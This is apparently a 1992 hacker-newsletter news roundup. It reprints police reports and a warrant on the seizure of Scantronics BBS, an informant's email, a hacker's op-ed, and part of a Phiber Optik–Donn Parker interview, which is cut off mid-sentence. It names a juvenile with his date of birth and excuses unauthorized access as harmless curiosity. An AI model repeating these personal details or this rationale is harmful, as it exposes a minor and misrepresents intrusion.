+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+ Scantronics BBS Seized By San Diego Police Department             July 1, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Knight Lightning and The Gatsby
+ Special Thanks to Bruce Bigelo (San Diego Union-Tribune)
+
+                 "Multiplexor and The Crypt Keeper Spill Guts"
+
+A lot of stories have been circulating in the press over the past two months
+about hordes of credit card stealing computer hackers that were disrupting
+the economy of the United States.  It all began with rumors about Multiplexor,
+a small time hacker that was thought to have spent some time in Long Island,
+New York and supposedly is from Indiana.  The story was that Multiplexor had
+carded a plane ticket to San Diego to see a girl or meet some friends, but
+when he landed, he was met by the police instead.
+
+Where that information or the supposed "1,000 member hacker ring" theory came
+from, we might never know, but we know do know the facts in this case thanks
+to police reports and warrant affidavits supplied by the court and acquired by
+The Gatsby with help.
+
+That information and more is now available.
+
+For purposes of understanding the following, "SEMENICK" and "MARCOV" are both
+the same person.  You might know him better under the names of Multiplexor or
+The Prisoner.  Later in this file, you will see references to a person named
+Kevin Marcus who is better known to some as The Crypt Keeper.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                          SAN DIEGO POLICE DEPARTMENT
+                         Investigators Follow-Up Report
+
+CASE NUMBER:  N/A
+DATE:         March 23, 1992
+TIME:         1300 Hours
+SUBJECT:      Damage Assessment of and Intelligence gathering on Illegal entry
+              (Hacking) Computer Systems and the Illegal use of Credit Cards.
+SUSPECT:      SEMENICK, John Edward        AKA: MARCOV, Eric Edward
+VICTIM:       Zales Jewelry Store
+LOCATION:     4465 La Jolla Village Drive, San Diego, CA
+DETECTIVE:    Dennis W. Sadler (I.D.# 2486)
+
+On March 31, 1992, I received a ARJIS 4 form from Officer Smyth (I.D.# 3871)
+regarding some papers found by a Mr. Maurice Osborne at his residence.
+
+Mr. Osborne had asked an individual by the name of Eric MARCOV, who had rented
+a room from him, to leave.  After MARCOV left the house, Mr. Osborne discovered
+some papers with what appeared to be credit card information on them.  Mr.
+Osborne called the police and reported what he found.
+
+Officer Smyth collected the papers and wrote the attached report.  After
+reviewing these papers, I learned that they did in fact contain some personal
+information on individuals which included the person's name, address, credit
+card number, card expiration date, and social security number.  It appeared
+that the person who wrote these notes was possibly using this credit card
+information illegally.
+
+I contacted Mr. Osborne by phone on March 31st.  He verified the contents of
+the report and he stated that he feels MARCOV may still be in town.  On April
+2nd, I was contacted by Mr. Osborne who learned that MARCOV was staying at a
+motel in the beach area named Sleepy Time.
+
+On April 2, 1992, while in the beach area, I came across the Sleepy Time Motel.
+I contacted the motel manager, William Gainok.  I asked Mr. Gainok if he had
+a person registered there by the name of Eric MARCOV.  He said that he did and
+that Marcov was in room number 108.
+
+At approximately 8:40 am, I knocked on the door to room number 108.  A white
+male answered the door.  I asked him if he was Eric MARCOV.  He said yes.  I
+identified myself as a San Diego Police Detective and told him that I needed
+to talk to him about some questionable credit card activity.
+
+As he opened the motel room door, I saw more papers like <those> given to me by
+Mr. Osborne laying on the floor near the door with more credit card information
+on them.  After being invited into the motel room, I asked MARCOV if he knew
+why I was here.  He said I think so.  I asked MARCOV why he thought so.  He
+said the credit cards.
+
+At this point, I was only interviewing MARCOV regarding the papers found at Mr.
+Osborne's residence.  I had no active case or any evidence indicating that
+MARCOV was involved in, or a suspect of any criminal or illegal activity.
+
+I asked MARCOV if he had any I.D. on him.  He said that he did not.  MARCOV
+gave me the following information; Eric Edward MARCOV, DOB 05-15-74, then
+changed the year to 73.  He said he was 18 going on 19.  He did not know his
+social security number.  When asked if he had a drivers' license, he said that
+he has never had one.  MARCOV appeared to be between the age of 17 to 19 years
+old.
+
+While asking him about papers, he started talking about computers and gaining
+information from various systems.  He talked for about 10 minutes.  After that,
+I decided to call the FBI because hacking was involved in obtaining the credit
+card information and numbers, plus the information was coming from out of
+state.  MARCOV also sounded like he knew a lot about computer hacking and was
+involved in it himself.
+
+At 8:58 am, I called the local office of the FBI and told them what I had and
+asked if they would be interested in talking with MARCOV.  I asked MARCOV prior
+to calling the FBI, if he would be willing to talk with them about his computer
+activities.  He agreed to talk with them.
+
+A short later Special Agent Keith Moses called me back at the motel.  I
+explained to him what I had and what MARCOV was willing to talk about.  After
+going over the case with Moses, he agreed to come out and talk with MARCOV.
+
+Both Moses and I interviewed MARCOV regarding his hacking activities and
+knowledge.  MARCOV was extensively involved in the hacking community during
+the last four years and had some superior knowledge about what was happening in
+the hacker world.  We later learned that he had been arrested for computer
+crimes in early 1991 in Indianapolis.  We attempted to contact the
+investigators that worked that case, but we never received any calls back after
+numerous attempts.
+
+During the interview, I attempted to confirm MARCOV's true identity.  I asked
+him for his parents' information.  He said he did not remember their home phone
+numbers, but they had a phone.  He also could not remember their home
+addresses.  I asked him for his parents' employment information.  He said that
+his father worked for a local (his home town) turbine company.
+
+I called the information number for the local phone company and then called the
+company to verify this information.  However, the company's personnel office
+could not locate any employee matching the name given to me by MARCOV.  MARCOV
+also gave me the school and year he graduated.  I called the local school
+district's administrative office and discovered they had no record of MARCOV
+attending or graduating from their school system.
+
+I confronted him with this information and he finally gave me his true
+information.  His true name was John Edward SEMENICK, DOB 05-15-75.  I located
+his father's work number and contacted him.  He was very uninterested about his
+son's whereabouts or condition.  When asked if he would supply an airline or
+bus ticket for transportation home, he said he would not.  His father further
+stated that when his son decided to come home, he'll have to find his own way.
+SEMENICK's parents are divorced and he lives with his father.  However, we
+learned that his mother had filed a runaway report with the local sheriff's
+office.
+
+I contacted his mother and she seemed a little more concerned, but said she
+would not provide a ticket or funds for his return.  I asked both parents if
+while John was in San Diego would they have any problems if their son assisted
+us in our investigation.  I explained to them that he was not facing any known
+criminal charges at that point and that the information he would be giving us
+would be for damage assessment and intelligence gathering purposes on hackers
+
+Both parents stated that they had no problem with him assisting us if he was
+not being charged.  Because SEMENICK was a juvenile and a runaway report was
+filed on him, we contacted the U.S. Attorney's office, the District Attorney's
+Juvenile Division, and the Juvenile Hall Probation Intake Officer for advice.
+
+They advised us that their was no problem with him giving us information.
+SEMENICK was booked into Juvenile hall as a runaway and then released to a
+halfway home for the evening.  The intake officer explained to us that because
+his parents would not send for him, they would only keep him for one evening
+and then he would be let go on his own again the next day.
+
+After SEMENICK went through the runaway process and was being released, we
+picked him back up.  The FBI agreed and furnished the fund's to put SEMENICK up
+in a hotel, give him living expenses, and then provide transportation for him
+home.  SEMENICK was put up in a suite at the Mission Valley Marriott.  He was
+allowed to do what he wanted while staying at the hotel and to see his friends
+at any time.
+
+During SEMENICK's stay at the Marriott, either myself or Agent Moses stayed in
+the hotel room next to SEMENICK's.  During the three day stay at the hotel,
+SEMENICK was able to provide us with some very useful information and
+intelligence.  It was not enough to make any arrest, but we obtained some very
+valuable information.  We were not able to independently verify the information
+by another source.
+
+During the period of April 3rd to April 5th, 1992, SEMENICK contacted numerous
+persons by phone who were involved in computer hacking.  SEMENICK willingly and
+voluntarily signed an FBI consent form giving us permission to record his phone
+calls during the course of our investigation.  There were numerous tape
+recorded phone conversations involving at least 4 separate individuals.
+
+During this same period of time, information in data format was also downloaded
+from another individual's computer located on the East Coast to the computer
+we had set up.  The information we received during the download was current
+credit records just obtained from CBI credit reporting company by this person,
+a CBI manual written in part by "Kludge" a San Diego hacker, and numerous
+other files/documents involving illegal activity such as "carding."  "Carding"
+is a term used by the hacker community regarding the illegal or fraudulent use
+of credit cards or credit card numbers by hackers nationwide.
+
+SEMENICK stated that he had been a member of a local BBS called Scantronics
+when he was an active hacker.  He stated that the board is run by a guy named
+"KLUDGE" and contains hundreds of files and documents.  He said that most of
+these files and documents contained on "KLUDGE's" computer are "how to"
+manuals.  This means that they instruct the person who obtains them through
+Scantronics BBS on how to do various things both legal and illegal.  Some of
+the illegal activities that are covered on this BBS is carding, phone hacking,
+ATM fraud, and credit bureau information.
+
+We obtained three documents written by or put out by either "KLUDGE" or
+Scantronics BBS.
+
+THIS INVESTIGATION IS ONGOING AT THIS TIME AND FURTHER INFORMATION AND EVIDENCE
+WILL BE ADDED.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                          SAN DIEGO POLICE DEPARTMENT
+                         Investigators Follow-Up Report
+
+CASE NUMBER:  N/A
+DATE:         April 30, 1992
+TIME:         0700 Hours
+SUBJECT:      Computer Hacking
+SUSPECT:      N/A
+VICTIM:       N/A
+LOCATION:     N/A
+DETECTIVE:    Dennis W. Sadler (I.D.# 2486)
+
+On April 16, 1992, I was contacted by Kevin Marcus.  Marcus learned that we
+were investigating individuals who were illegally logging (hacking) into
+various computer systems nationwide.  Marcus runs a local computer bulletin
+board system (BBS) called The Programmer's Paradise.  Marcus was concerned
+about the illegal activities had had seen on various local BBSs and contacted
+me.
+
+Marcus also said that he had received computer messages from a person who goes
+by the name (handle) of Knight Lightning in New York who asked him if he heard
+anything about our investigation.  Knight Lightning told Marcus that on April
+3rd a reporter from San Diego by the name of Bigelo had contacted and talked to
+him about our ongoing investigation.
+
+--  --  --  --  --  --  --  --
+Enclosure 1:
+
+Date: Fri, 10 Apr 1992 18:14:11 -500
+To: knight@eff.org
+From: Craig Neidorf <knight@eff.org>
+Subject: Runaway Teen Hacker Picked Up?
+
+I was just contacted by a reporter in San Diego about a hacker case.
+
+Apparently there is a teenage hacker from Indiana who ran away from home to
+California to see some girl there.  The local police and the FBI supposedly
+picked him up on April 3rd and he remains in their custody uncharged while he
+is telling them all sorts of information on hacker rings across the nation.
+
+Does anyone have any clues as to who this kid is or what's going on?
+
+:Knight Lightning
+
+--  --  --  --  --  --  --  --
+
+Enclosure 2:
+
+Date: Thu, 16 Apr 1992 22:25:17 -0400
+From: Craig Neidorf <knight@eff.org>
+To: tck@netlink.cts.com
+Subject: Re: Hi.
+
+Bruce Bigelo, Union Tribune.  Left his number at the office.  Nothing going on,
+but I understand that you called him.
+
+Craig
+
+--  --  --  --  --  --  --  --
+
+Marcus offered to assist us.  I asked if he knew of a BBS called Scantronics.
+He said that he did and that he had been a member of that BBS and view the
+files on that board in the past to see what the board carried.  Marcus is a
+computer science major at a local college and is doing research in the anti-
+virus field.  Marcus stated that the board carried a lot of technical data, but
+had nothing regarding his subject.  Marcus also belongs to other local and out-
+of-state BBSs where he talks with other individuals with his same interest.
+
+Marcus stated that he was last on Scantronics BBS about a month ago and he had
+seen numerous computer files that involved CBI and carding.  Carding is a term
+used by hackers who are involved in the illegal or fraudulent use of credit
+cards and their numbers.  These credit card numbers are obtained from credit
+reporting companies such as CBI and TRW, by illegally accessing (hacking) their
+way into those company computers and reading or copying private individuals
+credit reports and information.
+
+Most copies of credit reports from these companies will show a person's name,
+current and previous addresses, social security number, employer, salary, and
+all current credit history including all credit cards and their account
+numbers.  They <the hackers> then use these credit card numbers to obtain
+goods.
+
+If one of the hackers used an account number he found on a credit report that
+he illegally pulled from the credit reporting company, the victim would most
+likely not find out that their card had been illegally used until the next
+billing cycle which could be as much as 45 days after the illegal transaction
+took place.  According to the credit card industry, this is one of the most
+risk free and safest way to commit credit card fraud.
+
+Marcus said that the person's name who ran this BBS was Jeremy.  He did not
+know his last name, but the handle he is known by is "KLUDGE."  I asked if he
+knew the phone number to this BBS and he gave me 423-4852.  The BBS phone
+number, the operator's first name, and <the operator's> handle matched the
+information we had learned earlier.
+
+Marcus also gave me two disks <that> contained some files which had been
+downloaded (left on his BBS) by other persons on his system.  He regularly
+checks his board and removes or deletes files regarding questionable or illegal
+activity such as carding.
+
+I viewed both of these disks and they contained some very interesting files.
+These files included various topics <such as> an auto theft manual, CBI manual,
+TRW manual, American Express card info, and many other files which if
+downloaded or copied by another person, that person could easily gain illegal
+access to various credit reporting companies and commit various other illegal
+types of activity.
+
+I told Marcus if he came across any further information regarding this type of
+activity or further information about the BBS called Scantronics to please
+contact me.
+
+On April 17, 1992, I met Marcus and he said that he had logged onto Scantronics
+last night by using an access number a friend gave him.  This same friend had
+let him use his access number to gain access to this BBS on many prior
+occasions.  He did this on his own, without any direction whatsoever from me or
+any other law enforcement official.
+
+Marcus handed me a 5 1/4" computer disk and said that it contained some file
+listings and a list of all validated users.  Marcus also stated that the disk
+contained a copy of the messages that were sent to him through his BBS by the
+person in New York regarding our investigation [those messages displayed above
+from Knight Lightning].
+
+He asked me if I wanted him to log on and see for myself what was on "KLUDGE's"
+BBS.  I told him that I would have to consult with the D.A.'s office first.
+However, I was unable to get a hold of our D.A. liaison.  I told <Marcus> that
+I'd get back with him later.
+
+After talking to D.A. Mike Carlton, I advised Marcus not to go into Scantronics
+BBS unless it was for his own information.  However he said that if he came
+across any further information during his normal course of running his own BBS,
+he would notify me.
+
+--  --  --  --  --  --  --  --
+
+[The police report also contained 60 pages of printouts of postings and text
+files found on Scantronics BBS.  It is also made very clear that Kevin Marcus
+(aka The Crypt Keeper) accessed Scantronics BBS by using the password and
+account number of The Gatsby.  Files include:
+
+-  "Credit Bureau Information" which sounds harmless enough to begin with and
+    turns out is actually a reprint of an article from the September 27, 1992
+    issue of Business Week Magazine
+
+-  "Advanced Carding" by The Disk Jockey, which dates back to 1987.
+
+-  "The Complete CBI Manual of Operations" by Video Vindicator and Kludge,
+    dated October 10, 1991.
+
+ Aftermath
+ ~~~~~~~~~
+On April 23, 1992, a search warrant was issued in the municipal court of the State of California in the county of San Diego which authorized the seizure of:
+
+A.  All telephone company subscriber information to include service start date,
+    copy of most current billing statement, current credit information, and
+    location of telephone service to the following telephone numbers;
+    (619)XXX-XXXX and (619)XXX-XXXX and any other telephone number information
+    in any chain of call forwarding, to or from the listed phone numbers.
+
+B.  All telephone company records which includes subscriber information,
+    service start date, copy of most current billing statement, current credit
+    information, and location of telephone service phone numbers to which calls
+    are being forwarded to or from, from the listed phone numbers.
+
+               CERTIFICATION TO DEFER NOTIFICATION TO SUBSCRIBER
+
+     The Court finds there is substantial probable cause to believe
+     notification to the subscriber whose activities are recorded in the
+     records described above would impede or destroy this investigation.
+     Accordingly, the court certifies the request of the San Diego Police
+     Department that notification to the subscriber be deferred pending
+     further order of this court.
+
+
+On April 30, 1992, a search warrant was issued in the municipal court of the
+State of California in the county of San Diego which authorized the search of
+Kludge's residence and the seizure of:
+
+     All computer equipment and paraphernalia use in computer hacking, or apart
+     of the BBS known as Scantronics which includes, but is not limited to
+     monitor(s), keyboard(s), CPU(s), which may or may not contain hard disk
+     drive(s), floppy drive(s), tape drive(s), CD rom drive(s), modem(s),
+     fax/modem(s), all hard copies (paper copies) of any computer files which
+     have been stored or currently stored on/in a computer system, all
+     documents whether in hard or data form which show how to operate any
+     computer program or computer file, all memory storage devices which may
+     include hard disk drive(s), 5 1/4" and 3 1/2" computer memory storage
+     disks, all computer memory storage and computer back up tapes, and all
+     computer CD rom disks capable of computer data storage; and, documents and
+     effects which tend to show dominion and control over said premises and
+     computer system, including fingerprints, records, handwritings, documents
+     and effects which bear a form of identification such as a person's name,
+     photograph, social security number, or driver's license number and keys.
+
+The warrant was used immediately and Scantronics BBS and much more was seized.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ The Crypt Keeper Responds
+ ~~~~~~~~~~~~~~~~~~~~~~~~~
+Date: Wed, 17 Jun 92 09:13:50 PDT
+From: tck@bend.UCSD.EDU (Kevin Marcus)
+To: knight@eff.org
+Subject: Hmm.
+
+I'll start at the beginning...
+
+On April 3rd, I arrived at my workplace (a computer store) around 3 pm.
+Multiplexor is sitting in the back with some FBI agent and Detective Dennis
+Sadler.  The reason they chose my store for technical support is because Dennis
+and one of my managers are very good friends.
+
+I saw what was happening, and I saw Multiplexor call up Kludge's board and try
+to log on, but alas he was not validated.  Nonetheless, that same day I told
+Gatsby and Kludge what was up, because they are/were my friends and I didn't
+want something bad to happen to them.
+
+A few days later, my boss suggested that I tell Dennis that I was on Kludge's
+board awhile ago, but that I was not anymore because they might have found
+something on me.  So the next time I saw him (he comes in about once a week,
+still), I told him that I was on the board awhile ago, but that I wasn't
+anymore.  He asked a few stupid questions and I didn't really say a whole bunch
+about.
+
+He eventually found out that I had warned Kludge about his board.  I am not
+really sure how, I sure as heck didn't tell him.  He then told me that I
+nearly blew their investigation and for interfering with an investigation the
+maximum penalty was like 5 years or something like that.  He was getting ready
+to arrest me and take me down to the county courthouse when my boss was able to
+convince him that I was a good kid, not looking for trouble, and that I would
+get him something to re-strengthen.  So, even though Dennis didn't tell me
+specifically to get something from Kludge's board, he told me that what he
+needed to get his case back up to par was an idea of what was on the board,
+like a buffering of his system.
+
+That night I called up Gatsby and got his password from him.  I called and
+buffered.  The next time that I saw him [Sadler], I told him what I had done.
+He wanted to know how I got on Kludge's board, and I told him through a
+friend's account.  He asked me which friend, and I said "The Gatsby."  He then
+started asking me a bunch of questions about Gatsby such as, "What is his real
+name?"  And, at first I said that I didn't want to tell him, and then he said
+that I was withholding evidence and he could bust me on that alone.  So I told
+him his name and that he lived in XXXXX (a suburb of San Diego).  They already
+had him and Kludge in phone conversations over Kludge's line since it was taped
+for a while so they knew who he was in the first place.
+
+If Sadler didn't have anything hanging over my head, such as interfering with
+an investigation, and/or withholding evidence, then I would not have said jack,
+more than likely.  My first contact with him was on suggestion of my boss, who
+is a good friend of his, and he might have told my boss something which made
+him worry and think that I would be arrested for something, I do not know.
+
+Now, if I was a nark, then I can assure you that a LOT more people would have
+gone down.  I have a plethora of information on who is who, who is where, who
+does what, etc. and, even though it's old, I bet a lot of it is true.  If I
+wanted there to be another Operation Sun-Devil, then I would have given all of
+that information to him.  But I didn't, because that is not at all what I had
+wanted.  I didn't want anyone to get busted (including myself) for anything.
+
+If I were a nark, then I would probably have given him a lot more information,
+wouldn't you think?
+
+I sure do.
+
+I am not asking anyone to forget about it.  I know that I screwed up, but there
+is not a whole bunch about it that I can do right now.
+
+When Sadler was here asking me questions, it didn't pop into my mind that I
+should tell him to wait and then go and call my attorney, and then a few
+minutes later come back and tell him whatever my lawyer said.  I was scared.
+_______________________________________________________________________________
+
+ Hackers Aren't The Real Enemy                                     June 8, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Chris Goggans (ComputerWorld)(Page 37)
+
+(Goggans is a 23-year old hacker who is currently seeking employment with
+anyone who won't make him cut his hair.)
+
+For years articles have been published about people who call themselves
+"hackers."  These have been written by people who have investigated hackers,
+who have been the targets of hackers, who secure systems against hackers and
+who claim to know hackers.  As a member of the so-called "computer
+underground," I would like to present the hacker's point of view.
+
+I hope you will put aside any personal bias you may have toward people who call
+themselves  hackers  because it is probably based on media reports rather than
+real contact.
+
+I also hope you won't refuse to read this because you have a problem with my
+ethics.  Over the past 11 years, operating under the pseudonym Erik Bloodaxe, I
+had opportunities to become rich beyond the dreams of avarice and wreak great
+havoc on the world's computer networks.  Yet I have done neither.  I have
+looked behind doors that were marked "employees only" but have never disrupted
+the operation of business.  Voyeurism is a far cry from rape.
+
+Illegal, but not criminal
+
+Undeniably, the actions of some hackers are illegal, but they are still hardly
+criminal in nature.  The intention of most of these individuals is not to
+destroy or exploit systems but merely to learn in minute detail how they are
+used and what they are used for.  The quest is purely intellectual, but the
+drive to learn is so overwhelming that any obstacle blocking its course will be
+circumvented.  Unfortunately, the obstacles are usually state and federal laws
+on unauthorized computer access.
+
+The overwhelming difference between today's hackers and their 1960s MIT
+namesakes is that many of my contemporaries began their endeavors too young to
+have ready access to computer systems.  Few 13-year-olds find themselves with
+system privileges on a VAX through normal channels.
+
+My own first system was an Atari 8-bit computer with 16K of memory.  I soon
+realized that the potential of such a machine was extremely limited. With the
+purchase of a modem, however, I was able to branch out and suddenly found
+myself backed by state-of-the-art computing power at remote sites across the
+globe.  Often, I was given access by merely talking to administrators about the
+weak points in their systems, but most often my only access was whatever
+account I may have stumbled across.
+
+Many people find it hard to understand why anyone would risk prosecution just
+to explore a computer system.  I have asked myself that same question many
+times and cannot come up with a definitive answer.  I do know that it is an
+addiction so strong that it can, if not balanced with other activities, lead to
+total obsession.  Every hacker I know has spent days without sleep combing the
+recesses of a computer network, testing utilities and reading files.  Many
+times I have become so involved in a project that I have forgotten to eat.
+
+Hackers share almost no demographic similarities:  They are of all income
+levels, races, colors and religions and come from almost every country.  There
+are some shared characteristics, however.  Obsessive-compulsive behavior (drug
+or alcohol abuse, gambling, shoplifting) is one.  Others have a history of
+divorce in their families, intelligence scores in the gifted to genius level,
+poor study habits and a distrust of any authority figure.  Most hackers also
+combine inherent paranoia and a flair for the romantic -- which is apparent in
+the colorful pseudonyms in use throughout the hacker community.
+
+In most cases, however, once hackers reach college age -- or, at minimum, the
+age of legal employment -- access to the systems they desire is more readily
+available through traditional means, and the need to break a law to learn is
+curtailed.
+
+Popular media has contributed greatly to the negative use of the word "hacker."
+Any person found abusing a long-distance calling card or other credit card is
+referred to as a hacker.  Anyone found to have breached computer security on a
+system is likewise referred to as a hacker and heralded as a computer whiz,
+despite the fact that even those with the most basic computer literacy can
+breach computer security if they put their minds to it.
+
+Although the media would have you believe otherwise, all statistics show that
+hackers have never been more than a drop in the bucket when it comes to serious
+computer crime.  In fact, hackers are rarely more than a temporary nuisance, if
+they are discovered at all.  The real danger lies in the fact that their
+methods are easily duplicated by people whose motives are far more sinister.
+Text files and other information that hackers write on computer systems can be
+used by any would-be corporate spy to help form his plan of attack on a
+company.
+
+Given that almost everyone is aware of the existence and capabilities of
+hackers -- and aware of how others can go through the doors hackers open -- the
+total lack of security in the world's computers is shocking.
+
+Points of entry
+
+The primary problem is poor systems administration.  Users are allowed to
+select easily guessed passwords.  Directory permissions are poorly set.  Proper
+process accounting is neglected.  Utilities to counter these problems exist for
+every operating system, yet they are not widely used.
+
+Many systems administrators are not provided with current information to help
+them secure their systems.  There is a terrible lack of communication between
+vendors and customers and inside the corporate community as a whole.
+
+Rather than inform everyone of problems when they are discovered, vendors keep
+information in secret security databases or channel it to a select few through
+electronic-mail lists.  This does little to help the situation, and, in fact,
+it only makes matters worse because many hackers have access to these databases
+and to archives of the information sent in these mailing lists.
+
+Another major problem in system security comes from telecommunications
+equipment.  The various Bell operating companies have long been the targets of
+hackers, and many hackers know how to operate both corporate and central office
+systems better than the technicians who do so for a living.
+
+Increased use of computer networks has added a whole new dimension of
+insecurity.  If a computer is allowed to communicate with another on the same
+network, every computer in the link must be impenetrable or the security of all
+sites is in jeopardy.  The most stunning examples of this occur on the
+Internet.  With such a wide variety of problems and so little information
+available to remedy them, the field of computer security consulting is growing
+rapidly.  Unfortunately, what companies are buying is a false sense of
+security.  The main players seem to be the national accounting firms.  Their
+high-cost audits are most often procedural in nature, however, and are rarely
+conducted by individuals with enough technical expertise to make
+recommendations that will have a real and lasting effect.
+
+Ultimately, it is the responsibility of the systems administrators to ensure
+that they have the proper tools to secure their sites against intrusion.
+Acquiring the necessary information can be difficult, but if outsiders can get
+their hands on this information, so can the people who are paid to do the job.
+_______________________________________________________________________________
+
+                               THE GREAT DEBATE
+
+                          Phiber Optik v. Donn Parker
+
+ Cyberpunk Meets Mr. Security                                         June 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Jonathan Littman (PC Computing Magazine)(Page 288)
+
+The boy cautiously approached the table and asked the tall, distinguished bald
+gentleman in the gray suit if he could join him.  The boy's conference name tag
+read Phiber Optik; the gentleman's read Donn Parker.  One was a member of the
+Legion of Doom, the infamous sect of teenage hackers charged with fraud,
+conspiracy, and illegal computer access in 1990; the other was a legendary
+security expert.
+
+The unlikely pair had been brought together by an unusual gathering, the
+nation's first Computers, Freedom, and Privacy conference, held in the San
+Francisco Bay Area on the last weekend of March 1991.  They were part of an
+eclectic mix of G-men, Secret Service agents, prosecutors, privacy advocates,
+and hackers who had come to see the other side up close.
+
+Only weeks before, Optik's laptop computer had been seized by state police in
+an investigation begun by the Secret Service.  Optik and fellow hackers Acid
+Phreak and Scorpion were among the first to come under the scrutiny of the
+Secret Service in the days of Operation Sun Devil, a 14-city sweep in the
+spring of 1990 that resulted in 42 seized computers, 23,000 confiscated disks,
+and four arrests.
+
+The criminal charges brought against Optik and his cohort included illegal
+computer access and trading in stolen access codes.  Optik, a juvenile at the
+time of his initial questioning, spent a day in jail and was later convicted of
+a misdemeanor for theft of services.
+
+Parker knew the story well.  Over the last two decades, the former Lutheran
+Sunday school teacher has interviewed dozens of criminals to whom computers
+were simply the tools of the trade.  Along the way, he earned a worldwide
+reputation as the bald eagle of computer crime.  Parker speaks frequently to
+law-enforcement agencies and corporations as a consultant to SRI International,
+a leading research and management firm based in Menlo Park, California.  His
+books Fighting Computer Crime and Crime by Computer, countless articles, and a
+large Justice Department study on computer ethics have established him as the
+foremost authority on the hacker psyche.
+
+PARKER: How do you view the ethics of getting into someone's computer system?
+
+OPTIK:  I know what your point of view is because I've read your papers and
+        I've listened to you talk.  I know that you think any entry, you know,
+        any unauthorized entry, is criminal.
+
+        I can't say I agree with that.  I do agree that anyone who's an
+        impressionable teenager, who's on the scene and wants to break into as
+        many computers as is humanly possible to prove a point, has the
+        potential to do damage, because they're juveniles and have no idea what
+        they're doing, and they're messing around in places that they have no
+        business being.
+
+        At the time, I was 17 years old and still a minor.  There was no way I
+        was going to be able to buy a Unix, a VAX, my own switching system.
+        These are the things I'm interested in learning how to program.  It
+        would not have been possible to access this type of computer
+        development environment had I not learned how to break into systems.
+        That's the way I see it.
+
+PARKER: What are you doing at this conference?  What's your purpose?
+
+OPTIK:  Basically I want to be exposed to as many people as possible and hear
+        as many people's views as I can.
+
+PARKER: What's your ultimate purpose then-what would you like to do as far as
+        a career?  Do you think this is a way for you to get into a career?
+
+OPTIK:  Well, of course, I hope to enter the computer industry.  Just by being
+        here, I hope to talk to people like you, the many people who are
+        professionals in the field, hear their views, have them hear my views.
+
+        See, the thing I regret the most is that there is this communication
+        gap, a lack of dialogue between people who proclaim themselves to be
+        hackers and people who are computer professionals.  I think if there
+        were a better dialogue among the more respectable type of hackers and
+        the computer professionals, then it would be a lot more productive.
+
+PARKER: How do you tell the difference between a more responsible type of
+        hacker? 
+
+OPTIK:  I realize that its a very big problem.  I can see that it's pretty
+        impossible to tell, and I can clearly understand how you come to the
+        conclusions that you initially state in your paper about how hackers
+        have been known to cheat, lie, and exaggerate.  I experienced that
+        firsthand all the time.  I mean, these people are generally like that.
+        Just keep in mind that a large number of them aren't really hardcore
+        hackers -- they're impressionable teenagers hanging out.  Its just that
+        the medium they're using to hang out is computers.
+
+        I don't consider myself part of that crowd at all.  I got into
+        computers early on. Like when I was entering junior high school.  I was
+        really young, it must have been preteen years.  I'm talking about 12 or
+        13 years old when I got a computer for Christmas.
+
+        I didn't immediately go online.  I'm not one of these kids today that
+        get a Commodore 64 with a modem for Christmas because they got good
+        grades on their report card.  The reason I would have called myself a
+        hacker is, I was hacking in the sense of exploring the world inside my
+        computer, as far as assembly language, machine language, electronics
+        tinkering, and things of that nature.  That truly interested me.
+
+        The whole social online thing I could really do without because that's
+        where these ideas come from.  You know, this whole negative, this bad
+        aftertaste I get in my mouth when I hear people put down the whole
+        hacking scene.  Its because of what they're hearing, and the reason
+        they're hearing this is because of the more outspoken people in this
+        "computer underground" and the twisted coverage in the media, which is
+        using this whole big hype to sell papers.
+
+        And the people who are paying the price for it are people like me; and
+        the people who are getting a twisted view of things are the
+        professionals, because they're only hearing the most vocal people.
+        It's another reason why I'm here, to represent people like myself, who
+        want other people to know there are such things as respectable hackers.
+        You know hacking goes beyond impressionable young teenage delinquents.
+
+PARKER: How would you define hacking?
+
+OPTIK:  It's this overall wanting to understand technology, to be able to
+        communicate with a machine on a very low level, to be able to program
+        it.  Like when I come upon a computer, it's like my brain wants to talk
+        to its microprocessor.  That's basically my philosophy.
+
+PARKER. And does it matter to you who actually owns the computer?
+
+OPTIK:  Usually it does.  Oh, at first it didn't matter.  The mere fact of
+        getting into Unix, and learning Unix, was important enough to warrant
+        me wanting to be on the system.  Not because of information that was in
+        there. I really don't care what the information is.
+
+        You know there's that whole Cyberpunk genre that believes information
+        should be free.  I believe in computer privacy wholly.  I mean if
+        someone wants something to be private, by all means let it be private.
+        I mean, information is not meant for everyone to see if you design it
+        as being private.  That's why there is such a thing as security.
+
+        If someone wants to keep something private, I'm not going to try to
+        read it.  It doesn't interest me. I couldn't care less what people are
+        saying to each other on electronic mail.  I'm there because I'm
+        interested in the hardware.
+
+PARKER: How is anyone else going to know that you're not interested in reading
+        their private mail?
+
+OPTIK:  That's a problem I have to deal with.  There's not a real solution in
+        the same way that there's no way that you're really going to be able
+        to tell whether someone's malicious or not.  Hackers do brag, cheat,
+        and exaggerate.  They might tell you one thing and then stab you in the
+        back and say something else.
+
+PARKER: I've interviewed over 120 so-called computer criminals.
+
+OPTIK:  Right.
+
+PARKER: I've interviewed a lot of hackers, and I've also interviewed a lot of
+        people engaged in all kinds of white-collar crime.
+
+OPTIK:  Yeah.
+
+PARKER: And it seems to me that the people I have talked with that have been
+        convicted of malicious hacking and have overcome and outgrown that
+        whole thing have gone into legitimate systems programming jobs where
+        there is great challenge, and they're very successful.  They are not
+        engaged in malicious hacking or criminal activity, and they're making a
+        career for themselves in technology that they love.
+
+OPTIK:  Right.
+
+PARKER: Why couldn't you go that route?  Why couldn't you get your credentials
+        by going to school like I did and like everybody else did who functions
+        as a professional in the computer field, and get a challenging job in
+        computer technology?
+
+OPTIK:  I certainly hope to get a challenging job in computer technology.  But
+        I just feel that where I live, and the way the school system is where I
+        am, it doesn't cater to my needs of wanting to learn as much about
+        technology as fast as I want to learn.
+
+PARKER: Yeah, but one of the things you have to learn, I guess, is patience,
+        and you have to be willing to work hard and learn the technology as
+        it's presented.
+
+OPTIK:  You know, you just have to remember that by being able to go places
+        that people shouldn't, I'm able to learn things about technology that
+        schools don't teach.  It's just that programs in local colleges where I
